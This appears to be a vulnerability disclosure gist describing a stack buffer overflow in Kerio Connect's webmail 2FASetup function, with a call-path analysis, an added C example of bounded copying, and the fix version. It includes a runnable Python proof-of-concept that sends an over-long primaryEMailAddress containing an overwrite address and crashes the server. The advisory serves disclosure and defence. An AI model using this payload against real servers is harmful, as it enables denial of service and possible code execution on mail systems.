@Frycos
Created January 31, 2023 07:57
Kerio Connect - Stack Buffer Overflow in 2FASetup

Frycos commented Jan 31, 2023

Introduction

The latest version 9.4.1 patch 1 (6445) of the software Kerio Connect is prone to a Stack Buffer Overflow located in the 2FASetup function of the webmail component. The attack can be carried out by any authenticated but otherwise unprivileged webmail user.

(screenshot: kerio1)

Details

The function bool kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::doSubmitDomainUserTwoFA(basic_string *param_1, basic_string *param_2, basic_string *param_3, basic_string *param_4, ulong param_5, int *param_6, short *param_7, short *param_8, bool param_9, basic_string *param_10) makes use of an unsafe strcpy(dest, src) call with user-controlled input.

(screenshot: kerio2)

The destination buffer is defined with a fixed size, char local_1c3 [128], and is filled from the user-controlled param_4 buffer as source. Tracing the input back leads to the function kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::submitTwoFA(basic_string *param_1, basic_string *param_2, basic_string *param_3, int *param_4, short *param_5, basic_string *param_6, int *param_7), where the value arrives as param_3. That parameter in turn comes from the caller kerio::mailserver::facades::webmail::SessionManFacade::submitUserTwoFA(SessionManFacade *this, TwoFAAuthenticationStatus *param_1, short *param_2, basic_string *param_3, basic_string *param_4, basic_string *param_5).
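To make the defect concrete, here is an added C example (not Kerio's code; only the 128-byte buffer size is taken from the advisory, every function name and input below is constructed) that shows the overflow condition a plain strcpy into a fixed stack buffer creates, and a bounded replacement that rejects over-long input instead of writing past the buffer:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed stack buffer named in the advisory (char local_1c3[128]). */
#define EMAIL_BUF_SIZE 128

/* Would a plain strcpy(dest, src) into a buffer of dest_size bytes overflow?
 * strcpy writes strlen(src) + 1 bytes (the terminating NUL included), so the
 * source must be strictly shorter than the destination buffer. */
bool strcpy_would_overflow(const char *src, size_t dest_size) {
    return strlen(src) + 1 > dest_size;
}

/* Hardened replacement for the unsafe pattern (hypothetical helper): reject
 * input that does not fit instead of truncating it silently, never read past
 * dest_size bytes of src, and always leave dest NUL-terminated.
 * Returns true on success, false (with dest set to "") if src does not fit. */
bool copy_email_bounded(char *dest, size_t dest_size, const char *src) {
    if (dest_size == 0) return false;
    /* Look for the terminator within the first dest_size bytes only. */
    const char *nul = memchr(src, '\0', dest_size);
    if (nul == NULL) {              /* no NUL within dest_size: too long */
        dest[0] = '\0';
        return false;
    }
    size_t len = (size_t)(nul - src);
    memcpy(dest, src, len + 1);     /* copies the NUL as well */
    return true;
}

/* Models a request handler receiving a submitted primaryEMailAddress value
 * (hypothetical; not the product's handler). Returns 1 if the value was
 * accepted into the local buffer, 0 if it was rejected as too long. */
int handle_primary_email(const char *primary_email) {
    char local_buf[EMAIL_BUF_SIZE];
    if (!copy_email_bounded(local_buf, sizeof local_buf, primary_email)) {
        fprintf(stderr, "rejected: primaryEMailAddress exceeds %d bytes\n",
                EMAIL_BUF_SIZE - 1);
        return 0;
    }
    printf("accepted: %s\n", local_buf);
    return 1;
}

int main(void) {
    /* Constructed inputs: a normal address and an over-long value of the same
     * length as the 383-byte filler used in the advisory's proof of concept. */
    char long_input[384];
    memset(long_input, 'A', 383);
    long_input[383] = '\0';

    printf("strcpy of a normal address overflows: %s\n",
           strcpy_would_overflow("user@example.com", EMAIL_BUF_SIZE) ? "yes" : "no");
    printf("strcpy of a 383-byte value overflows: %s\n",
           strcpy_would_overflow(long_input, EMAIL_BUF_SIZE) ? "yes" : "no");

    handle_primary_email("user@example.com");   /* accepted */
    handle_primary_email(long_input);           /* rejected, no write past buffer */
    return 0;
}
```

The check is deliberately "fits or fails" rather than a truncating strncpy: a silently truncated address still passes through the rest of the handler with a value the user never submitted, and strncpy leaves dest unterminated when the source is too long, which only moves the memory-safety problem one call further on.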

The code is reached by triggering the 2FASetup in the webmail application running on TCP port 80 as a normal user, i.e. no administrative permissions are needed. The 2FASetup is commonly seen enabled, since it further secures the login procedure against threat actors trying to access a mailbox with leaked credentials.

(screenshot: kerio3)

When the user starts the 2FASetup

(screenshot: kerio4)
(screenshot: kerio5)

a request to the server with the parameters token and primaryEMailAddress is sent.

(screenshot: kerio6)

This request gets processed by the vulnerable code path mentioned above.

Proof-of-concept Exploitation

To prove that the vulnerable strcpy is indeed fed user-controlled data from these parameters, a proof-of-concept Python script was written.

import requests
import sys

if len(sys.argv) < 3:
	print("usage: python poc.py <SESSION_CONNECT_WEBMAIL> <TOKEN_CONNECT_WEBMAIL>(=<X-Token>)")
	sys.exit(1)

session = requests.Session()

# JSON-RPC endpoint of the webmail application (TCP port 80, see above)
burp0_url = "http://localhost:80/webmail/api/jsonrpc/"
# session cookies and X-Token taken from an authenticated webmail session
burp0_cookies = {"SESSION_CONNECT_WEBMAIL": sys.argv[1], "TOKEN_CONNECT_WEBMAIL": sys.argv[2]}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0", "Accept": "application/json-rpc", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Token": sys.argv[2], "X-Requested-With": "XMLHttpRequest", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/webmail/", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
nicestring = '\xb2\x5f\xa3\x02'  # 0x02a35fb2 in little-endian byte order
# over-long primaryEMailAddress value: far more than the 128-byte stack buffer
shell = "A"*383 + nicestring + "B"*100
# Session.submitUserTwoFA is the JSON-RPC method behind the 2FASetup request;
# a str body is sent as latin-1 by the HTTP client, so the bytes above arrive unchanged
payload = '{\"id\": 16, \"jsonrpc\": \"2.0\", \"method\": \"Session.submitUserTwoFA\", \"params\": {\"primaryEMailAddress\": ' + '\"' +  shell + '\"' + ', "token": "123456"}}'
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=payload)
print("Payload sent...")

The GNU debugger gdb (with the gef extension) is used to debug the running binary, started as /opt/kerio/mailserver/mailserver /opt/kerio/mailserver. A breakpoint is set on the vulnerable strcpy call at 0x0130f947.

Then the Python script is called with the two cookie values as its parameters: poc_sent.py 662a37f6e6fd2ed91307b8ce13998111ccf3a1b653b0cf58b22eaab8967f1103 a1d4229ded44eb257a58a4a99b3437ee0f1a19a563828c8ab9158ae0112b88db.

The breakpoint indeed is hit.

(screenshot: kerio7)

Because the stack buffer overflow overwrites several other stack variables, the mailserver binary crashes and is (or has to be) restarted.

(screenshot: kerio8)

Patch

Version 10.0.0 fixed this issue properly.
